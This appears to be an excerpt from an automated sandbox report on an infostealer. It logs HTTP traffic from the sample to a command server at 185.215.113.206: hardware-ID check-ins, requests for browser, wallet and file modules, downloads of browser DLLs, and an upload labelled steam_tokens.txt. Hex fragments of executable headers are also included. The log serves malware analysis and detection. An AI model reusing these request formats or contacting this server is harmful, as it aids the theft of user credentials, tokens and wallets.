00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 29 Oct 2024 03:52:33 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "3ef50-5e7e950876500"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 29 Oct 2024 03:52:33 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "13bf0-5e7e950876500"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECAEGHIJEHJDHIDHIDAEHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 43 41 45 47 48 49 4a 45 48 4a 44 48 49 44 48 49 44 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 31 34 31 42 37 45 34 39 44 37 42 31 39 35 33 34 34 38 30 31 39 0d 0a 2d 2d 2d 2d 2d 2d 45 43 41 45 47 48 49 4a 45 48 4a 44 48 49 44 48 49 44 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 45 43 41 45 47 48 49 4a 45 48 4a 44 48 49 44 48 49 44 41 45 2d 2d 0d 0a Data Ascii: ------ECAEGHIJEHJDHIDHIDAEContent-Disposition: form-data; name="hwid"4141B7E49D7B1953448019------ECAEGHIJEHJDHIDHIDAEContent-Disposition: form-data; name="build"tale------ECAEGHIJEHJDHIDHIDAE--
Source: global traffic HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJJJJKEHCAKFBFHJKEHCHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 4a 4b 45 48 43 41 4b 46 42 46 48 4a 4b 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 30 61 36 35 66 62 31 39 39 64 39 31 61 30 61 32 64 34 37 64 61 66 32 39 62 35 34 66 30 64 34 64 34 34 63 32 31 61 31 33 35 36 32 37 62 37 62 34 38 30 61 66 31 36 32 30 64 32 38 31 34 30 34 34 38 35 64 39 38 39 39 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 4a 4b 45 48 43 41 4b 46 42 46 48 4a 4b 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 4a 4b 45 48 43 41 4b 46 42 46 48 4a 4b 45 48 43 2d 2d 0d 0a Data Ascii: ------HJJJJKEHCAKFBFHJKEHCContent-Disposition: form-data; name="token"80a65fb199d91a0a2d47daf29b54f0d4d44c21a135627b7b480af1620d281404485d9899------HJJJJKEHCAKFBFHJKEHCContent-Disposition: form-data; name="message"browsers------HJJJJKEHCAKFBFHJKEHC--
Source: global traffic HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJECAAEHCFIEBGCBGHIEHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 45 43 41 41 45 48 43 46 49 45 42 47 43 42 47 48 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 30 61 36 35 66 62 31 39 39 64 39 31 61 30 61 32 64 34 37 64 61 66 32 39 62 35 34 66 30 64 34 64 34 34 63 32 31 61 31 33 35 36 32 37 62 37 62 34 38 30 61 66 31 36 32 30 64 32 38 31 34 30 34 34 38 35 64 39 38 39 39 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 45 43 41 41 45 48 43 46 49 45 42 47 43 42 47 48 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 45 43 41 41 45 48 43 46 49 45 42 47 43 42 47 48 49 45 2d 2d 0d 0a Data Ascii: ------JJECAAEHCFIEBGCBGHIEContent-Disposition: form-data; name="token"80a65fb199d91a0a2d47daf29b54f0d4d44c21a135627b7b480af1620d281404485d9899------JJECAAEHCFIEBGCBGHIEContent-Disposition: form-data; name="message"plugins------JJECAAEHCFIEBGCBGHIE--
Source: global traffic HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHJJECBKKECFIEBGCAKJHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 48 4a 4a 45 43 42 4b 4b 45 43 46 49 45 42 47 43 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 30 61 36 35 66 62 31 39 39 64 39 31 61 30 61 32 64 34 37 64 61 66 32 39 62 35 34 66 30 64 34 64 34 34 63 32 31 61 31 33 35 36 32 37 62 37 62 34 38 30 61 66 31 36 32 30 64 32 38 31 34 30 34 34 38 35 64 39 38 39 39 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 4a 45 43 42 4b 4b 45 43 46 49 45 42 47 43 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 4a 45 43 42 4b 4b 45 43 46 49 45 42 47 43 41 4b 4a 2d 2d 0d 0a Data Ascii: ------EHJJECBKKECFIEBGCAKJContent-Disposition: form-data; name="token"80a65fb199d91a0a2d47daf29b54f0d4d44c21a135627b7b480af1620d281404485d9899------EHJJECBKKECFIEBGCAKJContent-Disposition: form-data; name="message"fplugins------EHJJECBKKECFIEBGCAKJ--
Source: global traffic HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KKEHDBAEGIIIEBGCAAFHHost: 185.215.113.206Content-Length: 5699Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /746f34465cf17784/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGHIDHCAAKECGCBFIJDBHost: 185.215.113.206Content-Length: 991Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IECFIEGDBKJKFIDHIECGHost: 185.215.113.206Content-Length: 1451Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KEBGHCBAEGDHIDGCBAECHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 45 42 47 48 43 42 41 45 47 44 48 49 44 47 43 42 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 30 61 36 35 66 62 31 39 39 64 39 31 61 30 61 32 64 34 37 64 61 66 32 39 62 35 34 66 30 64 34 64 34 34 63 32 31 61 31 33 35 36 32 37 62 37 62 34 38 30 61 66 31 36 32 30 64 32 38 31 34 30 34 34 38 35 64 39 38 39 39 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 42 47 48 43 42 41 45 47 44 48 49 44 47 43 42 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 42 47 48 43 42 41 45 47 44 48 49 44 47 43 42 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 42 47 48 43 42 41 45 47 44 48 49 44 47 43 42 41 45 43 2d 2d 0d 0a Data Ascii: ------KEBGHCBAEGDHIDGCBAECContent-Disposition: form-data; name="token"80a65fb199d91a0a2d47daf29b54f0d4d44c21a135627b7b480af1620d281404485d9899------KEBGHCBAEGDHIDGCBAECContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------KEBGHCBAEGDHIDGCBAECContent-Disposition: form-data; name="file"------KEBGHCBAEGDHIDGCBAEC--
Source: global traffic HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KFBGDBFBKKJECBFHDGIEHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 46 42 47 44 42 46 42 4b 4b 4a 45 43 42 46 48 44 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 30 61 36 35 66 62 31 39 39 64 39 31 61 30 61 32 64 34 37 64 61 66 32 39 62 35 34 66 30 64 34 64 34 34 63 32 31 61 31 33 35 36 32 37 62 37 62 34 38 30 61 66 31 36 32 30 64 32 38 31 34 30 34 34 38 35 64 39 38 39 39 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 42 47 44 42 46 42 4b 4b 4a 45 43 42 46 48 44 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 42 47 44 42 46 42 4b 4b 4a 45 43 42 46 48 44 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 42 47 44 42 46 42 4b 4b 4a 45 43 42 46 48 44 47 49 45 2d 2d 0d 0a Data Ascii: ------KFBGDBFBKKJECBFHDGIEContent-Disposition: form-data; name="token"80a65fb199d91a0a2d47daf29b54f0d4d44c21a135627b7b480af1620d281404485d9899------KFBGDBFBKKJECBFHDGIEContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------KFBGDBFBKKJECBFHDGIEContent-Disposition: form-data; name="file"------KFBGDBFBKKJECBFHDGIE--
Source: global traffic HTTP traffic detected: GET /746f34465cf17784/freebl3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /746f34465cf17784/mozglue.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /746f34465cf17784/msvcp140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /746f34465cf17784/nss3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /746f34465cf17784/softokn3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /746f34465cf17784/vcruntime140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECBGHCGCBKFIECBFHIDGHost: 185.215.113.206Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CBKJJEHCBAKFBFHJKFBKHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 42 4b 4a 4a 45 48 43 42 41 4b 46 42 46 48 4a 4b 46 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 30 61 36 35 66 62 31 39 39 64 39 31 61 30 61 32 64 34 37 64 61 66 32 39 62 35 34 66 30 64 34 64 34 34 63 32 31 61 31 33 35 36 32 37 62 37 62 34 38 30 61 66 31 36 32 30 64 32 38 31 34 30 34 34 38 35 64 39 38 39 39 0d 0a 2d 2d 2d 2d 2d 2d 43 42 4b 4a 4a 45 48 43 42 41 4b 46 42 46 48 4a 4b 46 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 43 42 4b 4a 4a 45 48 43 42 41 4b 46 42 46 48 4a 4b 46 42 4b 2d 2d 0d 0a Data Ascii: ------CBKJJEHCBAKFBFHJKFBKContent-Disposition: form-data; name="token"80a65fb199d91a0a2d47daf29b54f0d4d44c21a135627b7b480af1620d281404485d9899------CBKJJEHCBAKFBFHJKFBKContent-Disposition: form-data; name="message"wallets------CBKJJEHCBAKFBFHJKFBK--
Source: global traffic HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHJKJDGCGDAKFHIDBGCBHost: 185.215.113.206Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 48 4a 4b 4a 44 47 43 47 44 41 4b 46 48 49 44 42 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 30 61 36 35 66 62 31 39 39 64 39 31 61 30 61 32 64 34 37 64 61 66 32 39 62 35 34 66 30 64 34 64 34 34 63 32 31 61 31 33 35 36 32 37 62 37 62 34 38 30 61 66 31 36 32 30 64 32 38 31 34 30 34 34 38 35 64 39 38 39 39 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 4b 4a 44 47 43 47 44 41 4b 46 48 49 44 42 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 4b 4a 44 47 43 47 44 41 4b 46 48 49 44 42 47 43 42 2d 2d 0d 0a Data Ascii: ------EHJKJDGCGDAKFHIDBGCBContent-Disposition: form-data; name="token"80a65fb199d91a0a2d47daf29b54f0d4d44c21a135627b7b480af1620d281404485d9899------EHJKJDGCGDAKFHIDBGCBContent-Disposition: form-data; name="message"files------EHJKJDGCGDAKFHIDBGCB--
Source: global traffic HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GCGHCBKFCFBFHIDHDBFCHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 43 47 48 43 42 4b 46 43 46 42 46 48 49 44 48 44 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 30 61 36 35 66 62 31 39 39 64 39 31 61 30 61 32 64 34 37 64 61 66 32 39 62 35 34 66 30 64 34 64 34 34 63 32 31 61 31 33 35 36 32 37 62 37 62 34 38 30 61 66 31 36 32 30 64 32 38 31 34 30 34 34 38 35 64 39 38 39 39 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 48 43 42 4b 46 43 46 42 46 48 49 44 48 44 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 48 43 42 4b 46 43 46 42 46 48 49 44 48 44 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 48 43 42 4b 46 43 46 42 46 48 49 44 48 44 42 46 43 2d 2d 0d 0a Data Ascii: ------GCGHCBKFCFBFHIDHDBFCContent-Disposition: form-data; name="token"80a65fb199d91a0a2d47daf29b54f0d4d44c21a135627b7b480af1620d281404485d9899------GCGHCBKFCFBFHIDHDBFCContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------GCGHCBKFCFBFHIDHDBFCContent-Disposition: form-data; name="file"------GCGHCBKFCFBFHIDHDBFC--
